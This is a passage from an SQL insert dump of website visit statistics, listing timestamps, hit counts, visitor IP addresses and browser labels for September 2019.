0,0,'157.55.39.244','other'),(446240,1567317077,1,1,0,0,'207.46.13.31','other'),(446241,1567317305,1,1,0,0,'40.77.167.97','other'),(446242,1567317424,1,1,0,0,'18.232.131.141','chrome'),(446243,1567319396,1,1,0,0,'176.9.9.94','other'),(446244,1567319548,1,1,0,0,'8.29.198.27','other'),(446245,1567320074,1,1,0,0,'66.249.66.136','chrome'),(446246,1567320716,1,1,0,0,'207.46.13.31','other'),(446247,1567320922,1,1,0,0,'46.211.100.144','chrome'),(446248,1567321165,2,2,0,0,'66.249.66.66','chrome'),(446249,1567321648,1,1,0,0,'8.29.198.27','other'),(446250,1567321849,1,1,0,0,'66.249.66.138','chrome'),(446251,1567322155,1,1,0,0,'66.249.66.136','chrome'),(446252,1567322702,2,2,0,0,'40.77.167.57','other'),(446253,1567324576,1,1,0,0,'40.77.167.57','other'),(446254,1567325547,1,1,0,0,'66.249.66.138','chrome'),(446255,1567325807,1,1,0,0,'13.66.139.0','other'),(446256,1567325944,1,1,0,0,'66.249.66.68','chrome'),(446257,1567326114,1,1,0,0,'66.249.66.136','chrome'),(446258,1567326491,1,1,0,0,'66.249.66.66','chrome'),(446259,1567326986,44,44,0,0,'95.216.19.59','other'),(446260,1567327763,1,1,0,0,'157.55.39.196','other'),(446261,1567328825,1,1,0,0,'66.249.66.64','chrome'),(446262,1567328913,1,1,0,0,'157.55.39.196','other'),(446263,1567328964,1,1,0,0,'87.250.224.81','other'),(446264,1567329052,1,1,0,0,'176.9.9.94','other'),(446265,1567330246,1,1,0,0,'188.166.175.190','firefox'),(446266,1567330395,1,1,0,0,'8.29.198.26','other'),(446267,1567330936,1,1,0,0,'66.249.66.66','chrome'),(446268,1567330957,4,4,0,0,'66.249.66.136','chrome'),(446269,1567331109,1,1,0,0,'40.77.167.57','other'),(446270,1567331275,1,1,0,0,'13.66.139.0','other'),(446271,1567332484,1,1,0,0,'8.29.198.27','other'),(446272,1567332810,1,1,0,0,'157.55.39.196','other'),(446273,1567333225,1,1,0,0,'141.8.188.29','other'),(446274,1567333880,1,1,0,0,'40.77.167.57','other'),(446275,1567334009,1,1,0,0,'58.250.125.152','other'),(446276,1567334477,1,1,0,0,'207.46.13.31','other'),(446277,1567334967,1,1,0,0,'157.55.39.196','other'),(446278,1567334977,1,1,0,0,'66.249.66.136','chrome'),(446279,1567335096,1,1,0,0,'66.249.66.68','chrome'),(446280,1567335551,1,1,0,0,'66.249.66.138','chrome'),(446281,1567335829,1,1,0,0,'207.46.13.31','other'),(446282,1567336476,1,1,0,0,'109.74.154.72','chrome'),(446283,1567336754,2,2,0,0,'157.55.39.196','other'),(446284,1567337525,1,1,0,0,'40.77.167.52','other'),(446285,1567337731,1,1,0,0,'87.250.224.47','other'),(446286,1567337959,1,1,0,0,'157.55.39.196','other'),(446287,1567338133,1,1,0,0,'66.249.66.138','chrome'),(446288,1567338604,1,1,0,0,'141.8.142.103','other'),(446289,1567338624,1,1,0,0,'13.66.139.0','other'),(446290,1567339850,1,1,0,0,'141.8.188.29','other'),(446291,1567340070,1,1,0,0,'66.249.66.138','chrome'),(446292,1567340818,1,1,0,0,'141.8.188.29','other'),(446293,1567341213,2,2,0,0,'40.77.167.222','other'),(446294,1567341231,1,1,0,0,'8.29.198.25','other'),(446295,1567341362,1,1,0,0,'40.77.167.207','other'),(446296,1567341949,1,1,0,0,'66.249.66.136','chrome'),(446297,1567342632,1,1,0,0,'5.45.207.8','other'),(446298,1567342676,1,1,0,0,'5.255.253.22','other'),(446299,1567343006,3,3,0,0,'157.55.39.196','other'),(446300,1567343052,1,1,0,0,'46.96.10.186','chrome'),(446301,1567343316,1,1,0,0,'8.29.198.26','other'),(446302,1567343353,1,1,0,0,'36.79.147.249','chrome'),(446303,1567343637,1,1,0,0,'141.8.142.162','other'),(446304,1567343639,1,1,0,0,'40.77.167.207','other'),(446305,1567345999,1,1,0,0,'157.55.39.196','other'),(446306,1567346542,1,1,0,0,'141.8.188.65','other'),(446307,1567347265,1,1,0,0,'95.108.213.4','other'),(446308,1567347453,1,1,0,0,'157.55.39.196','other'),(446309,1567348013,3,3,0,0,'13.59.43.96','chrome'),(446310,1567348166,1,1,0,0,'91.209.11.236','other'),(446311,1567348368,1,1,0,0,'46.211.74.138','chrome'),(446312,1567348464,2,2,0,0,'157.55.39.196','other'),(446313,1567348731,1,1,0,0,'5.45.207.8','other'),(446314,1567349737,1,1,0,0,'176.9.9.94','other'),(446315,1567349849,1,1,0,0,'141.8.188.11','other'),(446316,1567349900,1,1,0,0,'40.77.167.207','other'),(446317,1567349964,1,1,0,0,'5.45.207.79','other'),(446318,1567350803,1,1,0,0,'141.8.188.29','other'),(446319,1567350818,1,1,0,0,'5.45.207.19','other'),(446320,1567352071,1,1,0,0,'8.29.198.27','other'),(446321,1567352366,1,1,0,0,'157.55.39.219','other'),(446322,1567352944,1,1,0,0,'141.8.188.29','other'),(446323,1567353582,1,1,0,0,'40.77.167.140','other'),(446324,1567354167,1,1,0,0,'8.29.198.26','other'),(446325,1567354321,1,1,0,0,'157.55.39.228','other'),(446326,1567354557,1,1,0,0,'157.55.39.219','other'),(446327,1567354620,1,1,0,0,'87.250.224.99','other'),(446328,1567354736,1,1,0,0,'40.77.167.145','other'),(446329,1567355436,1,1,0,0,'141.8.188.11','other'),(446330,1567355454,1,1,0,0,'66.249.66.136','chrome'),(446331,1567356138,1,1,0,0,'40.77.167.33','other'),(446332,1567356517,1,1,0,0,'91.235.71.86','chrome'),(446333,1567356558,1,1,0,0,'5.45.207.79','other'),(446334,1567356566,1,1,0,0,'40.77.167.145','other'),(446335,1567357015,2,2,0,0,'40.77.167.140','other'),(446336,1567358682,1,1,0,0,'66.249.66.134','chrome'),(446337,1567358700,1,1,0,0,'178.154.171.30','other'),(446338,1567359339,1,1,0,0,'66.249.66.138','chrome'),(446339,1567359627,1,1,0,0,'40.77.167.140','other'),(446340,1567359825,1,1,0,0,'40.77.167.217','other'),(446341,1567360227,1,1,0,0,'87.250.224.99','other'),(446342,1567360258,1,1,0,0,'40.77.167.145','other'),(446343,1567360264,1,1,0,0,'37.9.113.148','other'),(446344,1567360633,1,1,0,0,'176.9.9.94','other'),(446345,1567361385,1,1,0,0,'66.249.66.136','chrome'),(446346,1567361440,1,1,0,0,'66.249.66.68','chrome'),(446347,1567361537,1,1,0,0,'40.77.167.145','other'),(446348,1567362629,1,1,0,0,'91.196.178.163','chrome'),(446349,1567362910,1,1,0,0,'8.29.198.25','other'),(446350,1567363106,1,1,0,0,'40.77.167.140','other'),(446351,1567363202,1,1,0,0,'141.8.188.11','other'),(446352,1567363977,2,2,0,0,'40.77.167.33','other'),(446353,1567364007,1,1,0,0,'40.77.167.25','other'),(446354,1567364868,1,1,0,0,'37.113.15.58','chrome'),(446355,1567365007,1,1,0,0,'8.29.198.27','other'),(446356,1567365417,1,1,0,0,'141.8.188.11','other'),(446357,1567366190,2,2,0,0,'40.77.167.25','other'),(446358,1567366653,1,1,0,0,'40.77.167.217','other'),(446359,1567366860,1,1,0,0,'87.250.224.81','other'),(446360,1567367441,1,1,0,0,'157.55.39.62','other'),(446361,1567368109,1,1,0,0,'141.8.188.29','other'),(446362,1567368267,1,1,0,0,'141.8.188.11','other'),(446363,1567368618,1,1,0,0,'95.24.28.17','msie'),(446364,1567368850,1,1,0,0,'157.55.39.228','other'),(446365,1567369479,1,1,0,0,'95.108.213.4','other'),(446366,1567369490,1,1,0,0,'141.8.188.29','other'),(446367,1567369746,2,2,0,0,'207.46.13.143','other'),(446368,1567370581,1,1,0,0,'5.35.87.58','msie'),(446369,1567370675,1,1,0,0,'141.8.188.29','other'),(446370,1567371518,1,1,0,0,'157.55.39.180','other'),(446371,1567371551,1,1,0,0,'157.55.39.228','other'),(446372,1567371999,2,2,0,0,'141.8.188.29','other'),(446373,1567372162,1,1,0,0,'157.55.39.51','other'),(446374,1567373065,1,1,0,0,'157.55.39.51','other'),(446375,1567373416,2,2,0,0,'141.8.188.11','other'),(446376,1567373741,1,1,0,0,'8.29.198.26','other'),(446377,1567374195,1,1,0,0,'157.55.39.202','other'),(446378,1567374512,1,1,0,0,'207.46.13.222','other'),(446379,1567375056,1,1,0,0,'157.55.39.51','other'),(446380,1567375204,1,1,0,0,'141.8.188.11','other'),(446381,1567375844,1,1,0,0,'8.29.198.26','other'),(446382,1567376155,2,2,0,0,'207.46.13.222','other'),(446383,1567377091,1,1,0,0,'157.55.39.51','other'),(446384,1567377434,1,1,0,0,'84.17.48.103','chrome'),(446385,1567379204,1,1,0,0,'207.46.13.95','other'),(446386,1567381947,1,1,0,0,'157.55.39.51','other'),(446387,1567382010,2,2,0,0,'141.8.188.29','other'),(446388,1567382850,2,2,0,0,'40.77.167.124','other'),(446389,1567383042,1,1,0,0,'66.249.66.134','chrome'),(446390,1567383218,1,1,0,0,'207.46.13.222','other'),(446391,1567384015,1,1,0,0,'176.9.9.94','other'),(446392,1567384053,1,1,0,0,'40.77.167.71','other'),(446393,1567384135,2,2,0,0,'40.77.167.124','other'),(446394,1567384969,1,1,0,0,'5.45.207.19','other'),(446395,1567385004,1,1,0,0,'8.29.198.25','other'),(446396,1567385222,1,1,0,0,'141.8.188.29','other'),(446397,1567386454,1,1,0,0,'40.77.167.124','other'),(446398,1567386684,1,1,0,0,'8.29.198.25','other'),(446399,1567387674,1,1,0,0,'40.77.167.71','other'),(446400,1567387817,1,1,0,0,'40.77.167.124','other'),(446401,1567387916,1,1,0,0,'141.8.188.11','other'),(446402,1567388151,1,1,0,0,'157.55.39.202','other'),(446403,1567388440,1,1,0,0,'5.45.207.79','other'),(446404,1567388464,1,1,0,0,'141.8.188.29','other'),(446405,1567389015,1,1,0,0,'40.77.167.124','other'),(446406,1567390069,1,1,0,0,'207.46.13.194','other'),(446407,1567390303,1,1,0,0,'91.209.11.236','other'),(446408,1567390574,1,1,0,0,'66.249.66.136','chrome'),(446409,1567390781,2,2,0,0,'66.249.66.134','chrome'),(446410,1567390931,1,1,0,0,'157.55.39.202','other'),(446411,1567390998,1,1,0,0,'207.46.13.194','other'),(446412,1567391352,1,1,0,0,'40.77.167.115','other'),(446413,1567392285,1,1,0,0,'141.8.188.29','other'),(446414,1567395019,1,1,0,0,'157.55.39.202','other'),(446415,1567395444,1,1,0,0,'40.77.167.71','other'),(446416,1567395938,1,1,0,0,'8.29.198.26','other'),(446417,1567397190,1,1,0,0,'141.8.188.11','other'),(446418,1567397524,1,1,0,0,'8.29.198.27','other'),(446419,1567397708,1,1,0,0,'207.46.13.170','other'),(446420,1567397873,1,1,0,0,'40.77.167.212','other'),(446421,1567398172,1,1,0,0,'157.55.39.202','other'),(446422,1567399545,1,1,0,0,'95.108.213.4','other'),(446423,1567399686,1,1,0,0,'62.205.134.182','other'),(446424,1567399925,2,2,0,0,'207.46.13.170','other'),(446425,1567400747,1,1,0,0,'141.8.188.29','other'),(446426,1567400871,1,1,0,0,'5.255.253.38','other'),(446427,1567401085,1,1,0,0,'40.77.167.176','other'),(446428,1567401289,1,1,0,0,'157.55.39.202','other'),(446429,1567401607,1,1,0,0,'66.249.66.66','chrome'),(446430,1567402795,1,1,0,0,'40.77.167.101','other'),(446431,1567404403,1,1,0,0,'91.209.11.236','other'),(446432,1567404525,1,1,0,0,'207.46.13.170','other'),(446433,1567405139,2,2,0,0,'157.55.39.93','other'),(446434,1567405161,2,2,0,0,'141.8.188.29','other'),(446435,1567406696,1,1,0,0,'207.46.13.170','other'),(446436,1567406801,1,1,0,0,'8.29.198.25','other'),(446437,1567408035,1,1,0,0,'141.8.188.29','other'),(446438,1567408201,1,1,0,0,'171.60.166.85','chrome'),(446439,1567408375,1,1,0,0,'8.29.198.25','other'),(446440,1567409069,1,1,0,0,'157.55.39.93','other'),(446441,1567409074,2,2,0,0,'207.46.13.170','other'),(446442,1567411481,1,1,0,0,'157.55.39.93','other'),(446443,1567412052,1,1,0,0,'207.46.13.7','other'),(446444,1567412234,1,1,0,0,'141.8.188.29','other'),(446445,1567413045,1,1,0,0,'157.55.39.198','other'),(446446,1567413211,1,1,0,0,'141.8.188.11','other'),(446447,1567414231,1,1,0,0,'66.249.66.136','chrome'),(446448,1567415086,1,1,0,0,'157.55.39.93','other'),(446449,1567416069,1,1,0,0,'193.106.30.99','chrome'),(446450,1567416776,1,1,0,0,'207.46.13.210','other'),(446451,1567417451,1,1,0,0,'5.45.207.79','other'),(446452,1567417452,1,1,0,0,'141.8.188.29','other'),(446453,1567417521,1,1,0,0,'46.211.46.246','other'),(446454,1567417659,1,1,0,0,'8.29.198.26','other'),(446455,1567417870,1,1,0,0,'141.170.226.217','chrome'),(446456,1567417872,1,1,0,0,'207.46.13.208','other'),(446457,1567418887,1,1,0,0,'207.46.13.7','other'),(446458,1567419220,1,1,0,0,'8.29.198.25','other'),(446459,1567419800,1,1,0,0,'5.45.207.79','other'),(446460,1567419885,2,2,0,0,'207.46.13.7','other'),(446461,1567420125,1,1,0,0,'52.162.161.148','other'),(446462,1567420808,1,1,0,0,'207.46.13.7','other'),(446463,1567421190,1,1,0,0,'77.37.143.86','chrome'),(446464,1567422974,2,2,0,0,'91.196.179.138','chrome'),(446465,1567423674,1,1,0,0,'109.74.154.72','chrome'),(446466,1567423867,1,1,0,0,'207.46.13.7','other'),(446467,1567424507,1,1,0,0,'178.95.83.181','chrome'),(446468,1567424532,1,1,0,0,'5.45.207.79','other'),(446469,1567424556,1,1,0,0,'87.250.224.65','other'),(446470,1567424562,1,1,0,0,'141.8.142.103','other'),(446471,1567424998,1,1,0,0,'40.77.167.18','other'),(446472,1567425381,1,1,0,0,'46.211.26.204','chrome'),(446473,1567425730,1,1,0,0,'141.8.188.11','other'),(446474,1567426686,1,1,0,0,'176.36.21.189','chrome'),(446475,1567426810,1,1,0,0,'37.52.16.8','chrome'),(446476,1567426961,1,1,0,0,'141.8.188.11','other'),(446477,1567426965,2,2,0,0,'40.77.167.18','other'),(446478,1567426980,2,2,0,0,'207.46.13.208','other'),(446479,1567427152,1,1,0,0,'141.8.188.29','other'),(446480,1567427350,1,1,0,0,'91.209.11.236','other'),(446481,1567428294,1,1,0,0,'40.77.167.18','other'),(446482,1567428347,1,1,0,0,'5.45.207.79','other'),(446483,1567428527,1,1,0,0,'8.29.198.25','other'),(446484,1567428811,1,1,0,0,'13.66.139.0','other'),(446485,1567429637,3,3,0,0,'207.46.13.7','other'),(446486,1567430058,1,1,0,0,'8.29.198.26','other'),(446487,1567430095,1,1,0,0,'91.196.178.179','chrome'),(446488,1567431037,1,1,0,0,'141.8.142.108','other'),(446489,1567431392,1,1,0,0,'207.46.13.208','other'),(446490,1567431472,1,1,0,0,'95.132.25.145','chrome'),(446491,1567432377,1,1,0,0,'62.244.60.90','chrome'),(446492,1567433548,1,1,0,0,'91.196.177.44','chrome'),(446493,1567434481,1,1,0,0,'5.53.116.14','chrome'),(446494,1567434520,2,2,0,0,'40.77.167.18','other'),(446495,1567434730,1,1,0,0,'5.45.207.79','other'),(446496,1567436439,3,3,0,0,'141.8.188.29','other'),(446497,1567436551,1,1,0,0,'157.55.39.167','other'),(446498,1567436984,1,1,0,0,'176.9.9.94','other'),(446499,1567438876,1,1,0,0,'157.55.39.167','other'),(446500,1567439417,1,1,0,0,'8.29.198.26','other'),(446501,1567439536,1,1,0,0,'141.8.188.29','other'),(446502,1567440251,1,1,0,0,'40.77.167.81','other'),(446503,1567440366,2,2,0,0,'207.46.13.15','other'),(446504,1567440408,1,1,0,0,'157.55.39.167','other'),(446505,1567440706,1,1,0,0,'95.108.181.54','other'),(446506,1567440904,1,1,0,0,'8.29.198.27','other'),(446507,1567441073,1,1,0,0,'128.124.254.14','chrome'),(446508,1567442094,1,1,0,0,'91.209.11.236','other'),(446509,1567443183,1,1,0,0,'141.8.188.29','other'),(446510,1567443245,1,1,0,0,'40.77.167.33','other'),(446511,1567443296,1,1,0,0,'66.249.66.134','chrome'),(446512,1567443438,1,0,1,0,'66.249.66.136',''),(446513,1567443999,1,1,0,0,'207.46.13.15','other'),(446514,1567444234,1,1,0,0,'141.8.188.29','other'),(446515,1567444257,1,1,0,0,'5.45.207.19','other'),(446516,1567445169,1,1,0,0,'66.249.66.88','chrome'),(446517,1567445354,2,2,0,0,'141.8.188.29','other'),(446518,1567446061,1,1,0,0,'193.106.30.99','chrome'),(446519,1567446120,1,1,0,0,'66.249.66.68','chrome'),(446520,1567447165,1,1,0,0,'40.77.167.33','other'),(446521,1567447181,1,1,0,0,'91.204.115.195','chrome'),(446522,1567447510,1,1,0,0,'157.55.39.167','other'),(446523,1567448703,2,2,0,0,'40.77.167.33','other'),(446524,1567449436,1,1,0,0,'46.211.67.63','chrome'),(446525,1567449894,1,1,0,0,'141.8.188.11','other'),(446526,1567450300,1,1,0,0,'8.29.198.25','other'),(446527,1567450376,1,1,0,0,'5.45.207.19','other'),(446528,1567451055,1,1,0,0,'40.77.167.33','other'),(446529,1567451484,1,1,0,0,'141.8.188.29','other'),(446530,1567451502,1,1,0,0,'66.249.66.66','chrome'),(446531,1567451504,1,0,1,0,'66.249.66.64',''),(446532,1567451745,1,1,0,0,'8.29.198.26','other'),(446533,1567452340,2,2,0,0,'40.77.167.81','other'),(446534,1567452391,1,1,0,0,'5.45.207.79','other'),(446535,1567453096,1,1,0,0,'46.211.66.144','chrome'),(446536,1567453284,1,1,0,0,'207.46.13.93','other'),(446537,1567454311,1,1,0,0,'66.249.66.136','chrome'),(446538,1567454383,1,1,0,0,'40.77.167.13','other'),(446539,1567454806,2,2,0,0,'95.213.141.126','opera'),(446540,1567455396,1,1,0,0,'78.111.190.17','firefox'),(446541,1567456107,2,2,0,0,'40.77.167.33','other'),(446542,1567456170,1,1,0,0,'40.77.167.13','other'),(446543,1567456540,1,1,0,0,'91.209.11.236','other'),(446544,1567457449,1,1,0,0,'141.8.188.29','other'),(446545,1567457544,1,1,0,0,'66.249.66.138','chrome'),(446546,1567457647,1,1,0,0,'5.45.207.79','other'),(446547,1567458490,2,2,0,0,'141.8.188.29','other'),(446548,1567458579,1,1,0,0,'141.8.188.11','other'),(446549,1567458986,1,1,0,0,'95.108.181.54','other'),(446550,1567459407,1,1,0,0,'66.249.66.64','chrome'),(446551,1567459734,2,2,0,0,'141.8.188.11','other'),(446552,1567461185,1,1,0,0,'8.29.198.25','other'),(446553,1567461761,1,1,0,0,'141.8.188.11','other'),(446554,1567462354,1,1,0,0,'40.77.167.176','other'),(446555,1567462467,1,1,0,0,'91.209.11.236','other'),(446556,1567462568,1,1,0,0,'40.77.167.13','other'),(446557,1567462571,1,1,0,0,'199.16.157.182','other'),(446558,1567462587,1,1,0,0,'8.29.198.27','other'),(446559,1567462793,1,1,0,0,'207.46.13.93','other'),(446560,1567463439,3,3,0,0,'141.8.188.29','other'),(446561,1567463516,1,1,0,0,'95.108.213.4','other'),(446562,1567463677,1,1,0,0,'141.8.188.11','other'),(446563,1567464817,1,1,0,0,'66.249.66.136','chrome'),(446564,1567465227,1,1,0,0,'95.108.213.4','other'),(446565,1567466998,1,1,0,0,'207.46.13.93','other'),(446566,1567468483,1,1,0,0,'66.249.66.134','chrome'),(446567,1567468699,1,1,0,0,'66.249.66.138','chrome'),(446568,1567468778,1,1,0,0,'141.8.142.108','other'),(446569,1567469604,1,1,0,0,'5.45.207.79','other'),(446570,1567469964,1,1,0,0,'141.8.188.29','other'),(446571,1567470940,2,2,0,0,'141.8.188.29','other'),(446572,1567471381,1,1,0,0,'207.46.13.157','other'),(446573,1567471480,1,1,0,0,'157.55.39.222','other'),(446574,1567472076,1,1,0,0,'8.29.198.26','other'),(446575,1567473429,1,1,0,0,'8.29.198.26','other'),(446576,1567473929,1,1,0,0,'193.106.30.99','chrome'),(446577,1567474350,1,1,0,0,'207.46.13.93','other'),(446578,1567478715,1,1,0,0,'141.8.188.11','other'),(446579,1567479626,1,1,0,0,'207.46.13.157','other'),(446580,1567480216,1,1,0,0,'207.46.13.93','other'),(446581,1567480652,1,1,0,0,'46.211.98.247','chrome'),(446582,1567480832,2,2,0,0,'141.8.188.11','other'),(446583,1567481079,1,1,0,0,'66.249.66.138','chrome'),(446584,1567481313,8,8,0,0,'88.99.2.203','other'),(446587,1567481328,3,3,0,0,'136.243.70.68','other'),(446588,1567481331,2,2,0,0,'141.8.188.29','other'),(446589,1567481411,1,1,0,0,'5.45.207.79','other'),(446590,1567481470,1,1,0,0,'207.46.13.157','other'),(446591,1567481943,1,1,0,0,'157.55.39.222','other'),(446592,1567482284,1,1,0,0,'88.99.2.203','other'),(446593,1567482941,1,1,0,0,'8.29.198.27','other'),(446594,1567483075,1,1,0,0,'157.55.39.222','other'),(446595,1567483243,1,1,0,0,'66.249.66.136','chrome'),(446596,1567483345,1,1,0,0,'88.99.2.203','other'),(446597,1567483767,1,1,0,0,'207.46.13.157','other'),(446598,1567483986,2,2,0,0,'141.8.188.29','other'),(446599,1567484045,2,2,0,0,'136.243.70.68','other'),(446600,1567484263,1,1,0,0,'8.29.198.27','other'),(446601,1567484325,1,1,0,0,'88.99.2.203','other'),(446602,1567484339,1,1,0,0,'91.196.178.136','firefox'),(446603,1567484390,1,1,0,0,'66.249.66.136','chrome'),(446604,1567485208,1,1,0,0,'207.46.13.134','other'),(446605,1567485912,1,1,0,0,'62.205.134.182','other'),(446606,1567486097,1,1,0,0,'207.46.13.157','other'),(446607,1567486765,1,1,0,0,'40.77.167.138','other'),(446608,1567486828,1,1,0,0,'46.211.133.80','chrome'),(446609,1567487086,2,2,0,0,'141.8.188.11','other'),(446610,1567487122,2,2,0,0,'141.8.188.29','other'),(446611,1567488994,1,1,0,0,'207.46.13.74','other'),(446612,1567489574,1,1,0,0,'66.249.66.136','chrome'),(446613,1567490615,1,1,0,0,'40.77.167.68','other'),(446614,1567493813,1,1,0,0,'8.29.198.27','other'),(446615,1567494774,2,2,0,0,'13.66.139.0','other'),(446616,1567494908,1,1,0,0,'207.46.13.70','other'),(446617,1567495129,1,1,0,0,'8.29.198.27','other'),(446618,1567495240,2,2,0,0,'207.46.13.74','other'),(446619,1567495245,2,2,0,0,'157.55.39.105','other'),(446620,1567495716,1,1,0,0,'88.99.2.203','other'),(446621,1567495724,1,1,0,0,'136.243.70.68','other'),(446622,1567496396,1,1,0,0,'157.55.39.105','other'),(446623,1567496685,1,1,0,0,'88.99.2.203','other'),(446624,1567496911,2,2,0,0,'195.69.221.54','chrome'),(446625,1567497202,2,2,0,0,'66.249.66.138','chrome'),(446626,1567497559,2,2,0,0,'207.46.13.74','other'),(446627,1567497586,1,1,0,0,'88.99.2.203','other'),(446628,1567498211,1,1,0,0,'31.148.175.244','chrome'),(446629,1567498545,1,1,0,0,'88.99.2.203','other'),(446630,1567498858,1,1,0,0,'91.209.11.236','other'),(446631,1567499897,1,1,0,0,'66.249.66.136','chrome'),(446632,1567500260,1,1,0,0,'207.46.13.70','other'),(446633,1567500399,1,1,0,0,'5.53.116.12','chrome'),(446634,1567502186,1,1,0,0,'157.55.39.105','other'),(446635,1567502386,1,1,0,0,'193.106.30.99','chrome'),(446636,1567503318,1,1,0,0,'40.77.167.74','other'),(446637,1567503466,1,1,0,0,'88.99.2.203','other'),(446638,1567504699,1,1,0,0,'8.29.198.25','other'),(446639,1567505027,1,1,0,0,'66.249.66.136','chrome'),(446640,1567505626,1,1,0,0,'88.99.2.203','other'),(446641,1567505717,1,1,0,0,'213.108.41.90','chrome'),(446642,1567505756,1,1,0,0,'91.209.11.236','other'),(446643,1567505957,1,1,0,0,'66.249.66.136','chrome'),(446644,1567506000,1,1,0,0,'8.29.198.25','other'),(446645,1567506403,1,1,0,0,'40.77.167.74','other'),(446646,1567506423,1,1,0,0,'157.55.39.167','other'),(446647,1567506711,1,1,0,0,'91.196.178.169','chrome'),(446648,1567506852,1,1,0,0,'46.211.130.220','chrome'),(446649,1567507302,1,1,0,0,'157.55.39.105','other'),(446650,1567507485,1,1,0,0,'66.249.66.138','chrome'),(446651,1567507488,1,0,1,0,'66.249.66.134',''),(446652,1567508098,1,1,0,0,'207.46.13.228','other'),(446653,1567509882,1,1,0,0,'66.249.66.134','chrome'),(446654,1567510666,1,1,0,0,'88.99.2.203','other'),(446655,1567511306,1,1,0,0,'66.249.66.138','chrome'),(446656,1567511327,3,3,0,0,'66.249.66.134','chrome'),(446657,1567511794,1,1,0,0,'207.46.13.228','other'),(446658,1567511985,1,1,0,0,'109.74.154.72','chrome'),(446659,1567512359,3,3,0,0,'207.46.13.74','other'),(446660,1567512660,1,1,0,0,'157.55.39.105','other'),(446661,1567512826,1,1,0,0,'88.99.2.203','other'),(446662,1567513011,1,1,0,0,'207.46.13.228','other'),(446663,1567513048,1,1,0,0,'66.249.66.68','chrome'),(446664,1567513578,1,1,0,0,'157.55.39.72','other'),(446665,1567513589,1,1,0,0,'46.219.75.8','chrome'),(446666,1567514002,1,1,0,0,'157.55.39.105','other'),(446667,1567515133,1,1,0,0,'66.249.66.134','chrome'),(446668,1567515378,1,1,0,0,'40.77.167.8','other'),(446669,1567515590,1,1,0,0,'8.29.198.25','other'),(446670,1567516189,1,1,0,0,'66.249.66.134','chrome'),(446671,1567516407,1,1,0,0,'207.46.13.228','other'),(446672,1567516893,1,1,0,0,'8.29.198.25','other'),(446673,1567517867,1,1,0,0,'88.99.2.203','other'),(446674,1567518578,1,1,0,0,'207.46.13.228','other'),(446675,1567518965,1,1,0,0,'13.66.139.0','other'),(446676,1567519197,1,1,0,0,'66.249.66.134','chrome'),(446677,1567520026,1,1,0,0,'88.99.2.203','other'),(446678,1567520550,1,1,0,0,'46.211.111.14','chrome'),(446679,1567520639,1,1,0,0,'54.208.102.37','other'),(446680,1567520642,1,1,0,0,'107.21.1.8','other'),(446681,1567520675,1,1,0,0,'157.55.39.151','other'),(446682,1567520931,1,1,0,0,'157.55.39.72','other'),(446683,1567521666,3,3,0,0,'40.77.167.8','other'),(446684,1567522257,2,2,0,0,'157.55.39.151','other'),(446685,1567522267,1,1,0,0,'157.55.39.50','other'),(446686,1567522541,1,1,0,0,'91.209.11.236','other'),(446687,1567522606,1,1,0,0,'91.196.178.71','firefox'),(446688,1567522804,1,1,0,0,'66.249.66.138','chrome'),(446689,1567522880,1,1,0,0,'66.249.69.122','chrome'),(446690,1567523010,2,2,0,0,'66.249.66.134','chrome'),(446691,1567523183,1,1,0,0,'157.55.39.151','other'),(446692,1567524516,1,1,0,0,'88.99.2.203','other'),(446693,1567524621,2,2,0,0,'66.249.66.142','chrome'),(446694,1567525486,1,1,0,0,'88.99.2.203','other'),(446695,1567525523,1,1,0,0,'157.55.39.50','other'),(446696,1567525982,1,1,0,0,'13.66.139.0','other'),(446697,1567526387,1,1,0,0,'88.99.2.203','other'),(446698,1567526531,1,1,0,0,'8.29.198.27','other'),(446699,1567526891,1,1,0,0,'40.77.167.154','other'),(446700,1567527346,1,1,0,0,'88.99.2.203','other'),(446701,1567527777,1,1,0,0,'8.29.198.26','other'),(446702,1567528572,1,1,0,0,'66.249.66.136','chrome'),(446703,1567528910,1,1,0,0,'91.209.11.236','other'),(446704,1567529317,1,1,0,0,'46.211.104.122','chrome'),(446705,1567530135,1,1,0,0,'66.249.66.136','chrome'),(446706,1567531326,1,1,0,0,'66.249.66.134','chrome'),(446707,1567531390,1,1,0,0,'157.55.39.72','other'),(446708,1567531984,1,1,0,0,'181.112.9.241','chrome'),(446709,1567532214,1,1,0,0,'54.36.149.70','other'),(446710,1567532269,1,1,0,0,'91.209.11.236','other'),(446711,1567532626,1,1,0,0,'54.36.149.105','other'),(446712,1567532799,1,1,0,0,'54.36.149.86','other'),(446713,1567533708,1,1,0,0,'40.77.167.179','other'),(446714,1567534203,1,1,0,0,'157.55.39.50','other'),(446715,1567534618,2,2,0,0,'40.77.167.179','other'),(446716,1567535572,1,1,0,0,'54.36.149.58','other'),(446717,1567535911,1,1,0,0,'54.36.149.8','other'),(446718,1567536995,2,2,0,0,'66.249.66.136','chrome'),(446719,1567537245,1,1,0,0,'46.211.24.249','chrome'),(446720,1567537249,1,1,0,0,'66.249.66.134','chrome'),(446721,1567537443,1,1,0,0,'8.29.198.26','other'),(446722,1567537458,1,1,0,0,'40.77.167.179','other'),(446723,1567537678,1,1,0,0,'66.249.66.64','chrome'),(446724,1567537703,1,1,0,0,'54.36.149.41','other'),(446725,1567537892,1,1,0,0,'66.249.66.66','chrome'),(446726,1567538512,1,1,0,0,'54.36.149.40','other'),(446727,1567538514,1,1,0,0,'66.249.66.68','chrome'),(446728,1567538600,1,1,0,0,'40.77.169.27','other'),(446729,1567538654,1,1,0,0,'8.29.198.25','other'),(446730,1567538772,4,4,0,0,'66.249.66.134','chrome'),(446731,1567539136,1,1,0,0,'66.249.66.64','chrome'),(446732,1567539165,1,1,0,0,'46.211.126.212','chrome'),(446733,1567539450,2,2,0,0,'66.249.66.68','chrome'),(446734,1567539672,1,1,0,0,'66.249.66.136','chrome'),(446735,1567540183,2,2,0,0,'66.249.66.134','chrome'),(446736,1567541502,1,1,0,0,'54.36.149.64','other'),(446737,1567545529,1,1,0,0,'66.249.66.138','chrome'),(446738,1567545635,1,1,0,0,'66.249.66.66','chrome'),(446739,1567545775,1,1,0,0,'54.36.149.73','other'),(446740,1567545880,1,1,0,0,'157.55.39.179','other'),(446741,1567546228,1,1,0,0,'157.55.39.67','other'),(446742,1567546258,1,1,0,0,'66.249.66.136','chrome'),(446743,1567547143,1,1,0,0,'157.55.39.29','other'),(446744,1567547289,1,1,0,0,'40.77.167.12','other'),(446745,1567548113,1,1,0,0,'157.55.39.67','other'),(446746,1567548119,2,2,0,0,'66.249.66.134','chrome'),(446747,1567548182,1,1,0,0,'54.36.149.57','other'),(446748,1567548346,1,1,0,0,'8.29.198.27','other'),(446749,1567548624,1,1,0,0,'66.249.66.136','chrom